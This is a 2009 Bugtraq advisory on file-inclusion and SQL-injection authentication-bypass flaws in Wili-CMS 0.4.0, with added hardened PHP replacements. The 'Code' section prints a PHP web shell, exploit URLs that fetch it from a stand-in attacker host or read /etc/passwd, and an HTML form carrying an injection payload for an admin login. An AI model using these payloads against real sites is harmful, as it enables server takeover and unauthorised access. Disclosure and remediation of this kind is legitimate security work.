Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Wili-CMS 0.4.0 Multiple Vulnerabilities (Remote/Local File Inclusion - Authentication Bypass)
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 6 Mar 2009 13:05:06 +0100
******* Salvatore "drosophila" Fresta *******
[+] Application: Wili-CMS
[+] Version: 0.4.0
[+] Website: http://wili-cms.sourceforge.net/
[+] Bugs: [A] Multiple Remote/Local File Inclusion
[B] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 06 Mar 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
- [A] Multiple Remote/Local File Inclusion
[-] Requisites: none for the include itself. The %00 truncation used in the
URLs under [+] Code additionally needs magic_quotes_gpc = off and PHP < 5.3.4
(later versions reject include paths containing a NUL byte); the remote
variant needs allow_url_include = On on PHP >= 5.2.
[-] File affected: index.php
Both include() calls below build their path from $globals['content_dir'],
which can be overridden from the request (the URLs under [+] Code pass it
as a GET parameter). An unauthenticated user can therefore include a remote
or local file of their choice and, with a remote PHP file, execute arbitrary
commands on the server. The exploit URLs use npage=-1 (a page id that does
not exist) to reach the error404.php branch and npage=1 for the root
template include.
...
// $globals['content_dir'] is attacker-controlled via the request (see [+] Code);
// the ."error404.php" suffix is what the %00 in the exploit URLs cuts off.
if ( $globals['dbh'] && !pageExists( $globals['pageid']['pid'] ) ) {
include( $globals['content_dir'].$globals['template_dir']."error404.php" );
}
...
// second include, reached when the requested page exists
include( template_file( $globals['root_template'] ) );
- [B] Authentication Bypass
[-] Requisites: magic_quotes_gpc = off
[-] File affected: lib/admin/init_session.php
This bug allows an unauthenticated user to log in as administrator without
knowing any password. The username and password are taken straight from
$_REQUEST, stored in the session and interpolated unescaped into the query
below, so with magic_quotes_gpc off the password field is an SQL injection
point. The payload 1') UNION ALL SELECT 1# closes PASSWORD('...'), appends
a result row with id 1 and comments out the rest of the statement, so
mysql_num_rows() is non-zero and $globals['uid'] becomes 1 (normally the
first, administrative, account) whatever the real password is.
...
// credentials come straight from the request, unescaped, and are kept in the session
$_SESSION['password'] = $_REQUEST['password'] ? $_REQUEST['password'] : $_SESSION['password'];
$globals['username'] = $_SESSION['uname'] = $_REQUEST['uname'] ? $_REQUEST['uname'] : $_SESSION['uname'];
...
// both values are concatenated into the SQL string; the password one is the injection point
$sth = mysql_query(
"SELECT id
FROM ".$globals['userstable']."
WHERE username='".$_SESSION['uname']."'
AND adminflag=1
AND password=PASSWORD('".$_SESSION['password']."')", $globals['dbh'] );
// password ok -> login
if ( mysql_num_rows( $sth ) && ( $globals['uid'] = mysql_result($sth,0) ) ) {
$globals['user'] = mysql_result( $userh = mysql_query( "SELECT id,
skipwelcome FROM ".$globals['userstable']." WHERE
username='".$globals['username']."'", $globals['dbh'] ),0,0);
if ( $globals['admin_modus'] == "loggedin" ) {
// log login
db_addlog( "Logged in from ".getenv("REMOTE_ADDR") );
// goto welcome page if skipwelcome flag of this user is not set
if ( !(mysql_result( $userh, 0, 1 )) ) {
$_REQUEST['npage'] = get_firstpage( "adminwelcome" );
}
$globals['admin_modus'] = "";
}
...
*************************************************
[+] Code
- [A] Multiple Remote/Local File Inclusion
shell.txt: <?php system($_GET['cmd']); ?>
http://www.site.com/path/?npage=-1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=1&content_dir=http://www.evilsite.com/shell.txt%00&cmd=ls
http://www.site.com/path/?npage=-1&content_dir=../../../../etc/passwd%00
http://www.site.com/path/?npage=1&content_dir=../../../../etc/passwd%00
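The advisory ships no fix, so the following shows what a hardened version of the two include() calls in index.php would look like. It is an added example, not Wili-CMS code: it assumes templates live under a fixed content/templates directory next to the script (the real layout and the template_file() helper are not shown on the page), takes the root from configuration instead of a request parameter, and rejects NUL bytes, stream wrappers and anything that resolves outside that root. The self-check at the bottom runs from the PHP CLI against the advisory's own payloads.

```php
<?php
// Added example, not Wili-CMS code. Hardened replacement for the include()
// calls in index.php: the content root is fixed at install time instead of
// being read from the request, and the final path must stay inside it.

declare(strict_types=1);

// Assumption: templates live under this directory; the real layout may differ.
define('CONTENT_ROOT', __DIR__ . '/content');

/**
 * Resolve $relative (e.g. "templates/error404.php") to an absolute path
 * inside CONTENT_ROOT, or return null if it is not a plain local file there.
 */
function safe_template_path(string $relative): ?string
{
    // PHP < 5.3.4 truncated include() paths at the first NUL byte, which is
    // what the "%00" in the advisory's URLs relies on; reject it outright.
    if (strpos($relative, "\0") !== false) {
        return null;
    }
    // Stream wrappers (http://, ftp://, php://, data:, ...) are never templates.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    $root = realpath(CONTENT_ROOT);
    if ($root === false) {
        return null;
    }
    // realpath() collapses "../", resolves symlinks and returns false when
    // the target does not exist, so "../../../../etc/passwd" comes back as
    // "/etc/passwd" and fails the prefix check below.
    $resolved = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($resolved === false) {
        return null;
    }
    if (strncmp($resolved, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $resolved;
}

// Self-check on the advisory's payloads plus one legitimate template.
// Run from the CLI: php safe_include.php
@mkdir(CONTENT_ROOT . '/templates', 0755, true);
file_put_contents(CONTENT_ROOT . '/templates/error404.php', "<?php echo 'not found';\n");

$cases = [
    'templates/error404.php'              => true,   // legitimate template
    "http://www.evilsite.com/shell.txt\0" => false,  // RFI with NUL truncation
    "../../../../etc/passwd\0"            => false,  // LFI with NUL truncation
    '../../../../etc/passwd'              => false,  // LFI without NUL
    'php://filter/resource=index.php'     => false,  // stream wrapper
];
foreach ($cases as $input => $expectOk) {
    $path = safe_template_path($input);
    $verdict = (($path !== null) === $expectOk) ? 'ok  ' : 'FAIL';
    printf("%s %-40s -> %s\n", $verdict, addcslashes($input, "\0"), $path ?? 'rejected');
}

// How the 404 branch from the advisory would use it:
$page = safe_template_path('templates/error404.php');
if ($page !== null) {
    include $page;
}
```

The prefix check is done on the realpath() result, not on the string the caller supplied, so symlinks and encoded traversal are covered as well; if a deployment needs templates outside the web root, add that directory to an explicit allow-list rather than loosening the check. Setting allow_url_include = Off in php.ini closes the remote variant independently of the application code.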
- [B] Authentication Bypass
<html>
<head>
<title>Wili-CMS 0.4.0 Authentication Bypass Exploit</title>
</head>
<body>
<form action="http://www.site.com/path/admin.php" method="POST">
<input type="text" name="uname" value="admin">
<input type="hidden" name="password" value="1') UNION ALL SELECT 1#">
<input type="hidden" name="mode" value="loggedin">
<input type="hidden" name="npage" value="1">
<input type="submit" value="Exploit">
</form>
</body>
</html>
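For the authentication bypass, the following is an added example, not Wili-CMS code, of how the admin login check in lib/admin/init_session.php can be rewritten so the request values cannot change the query. It assumes (none of this is on the page) a mysqli connection in $dbh, the users table name in $userstable, and a password column that holds password_hash() output instead of MySQL PASSWORD() values. vulnerable_query() reproduces the string the original code builds so the effect of the advisory's payload can be seen from the CLI without a database.

```php
<?php
// Added example, not Wili-CMS code: a hardened replacement for the admin
// login check in lib/admin/init_session.php. Assumptions (not from the
// advisory): a mysqli connection in $dbh, the users table name in
// $userstable, and a `password` column holding password_hash() output
// rather than MySQL PASSWORD() values.

declare(strict_types=1);

// The query string the original code hands to MySQL. With the advisory's
// payload the PASSWORD('...') literal is closed after '1', a UNION row with
// id = 1 is appended, and the '#' comments out the original closing quote
// and parenthesis, so mysql_num_rows() is non-zero and uid becomes 1.
function vulnerable_query(string $userstable, string $uname, string $password): string
{
    return "SELECT id FROM " . $userstable
         . " WHERE username='" . $uname . "'"
         . " AND adminflag=1"
         . " AND password=PASSWORD('" . $password . "')";
}

// Return the admin user's id for a valid username/password pair, or null.
// Both request values are bound as parameters, so they cannot alter the
// statement's structure, and the password is verified in PHP with a slow
// hash instead of being compared inside SQL.
function admin_login(mysqli $dbh, string $userstable, string $uname, string $password): ?int
{
    // The table name cannot be bound; it comes from configuration, not the
    // request, but quote it as an identifier anyway.
    $table = '`' . str_replace('`', '``', $userstable) . '`';
    $stmt  = $dbh->prepare("SELECT id, password FROM $table WHERE username = ? AND adminflag = 1");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $uname);
    $stmt->execute();
    $stmt->bind_result($id, $hash);
    $found = ($stmt->fetch() === true);
    $stmt->close();

    if (!$found || !password_verify($password, (string) $hash)) {
        return null;
    }
    return (int) $id;
}

// CLI self-check of the statement the original code would build with the
// advisory's payload (no database needed): php login_fix.php
echo vulnerable_query('users', 'admin', "1') UNION ALL SELECT 1#"), "\n";
```

Two further changes belong with this fix. The original stores the submitted password in $_SESSION and re-runs the lookup on every request; after a successful admin_login() only the numeric id should be kept in the session, with session_regenerate_id(true) called at that point. And mysql_real_escape_string() on the two inputs would stop this particular payload, but prepared statements remove the class of bug rather than one instance of it.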
*************************************************
[+] Fix
No vendor fix was available at the time of publication. Until one exists:
do not let content_dir (or any other path component) come from the request,
set allow_url_include = Off, and escape or parameterise the uname and
password values before they reach the query in lib/admin/init_session.php.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351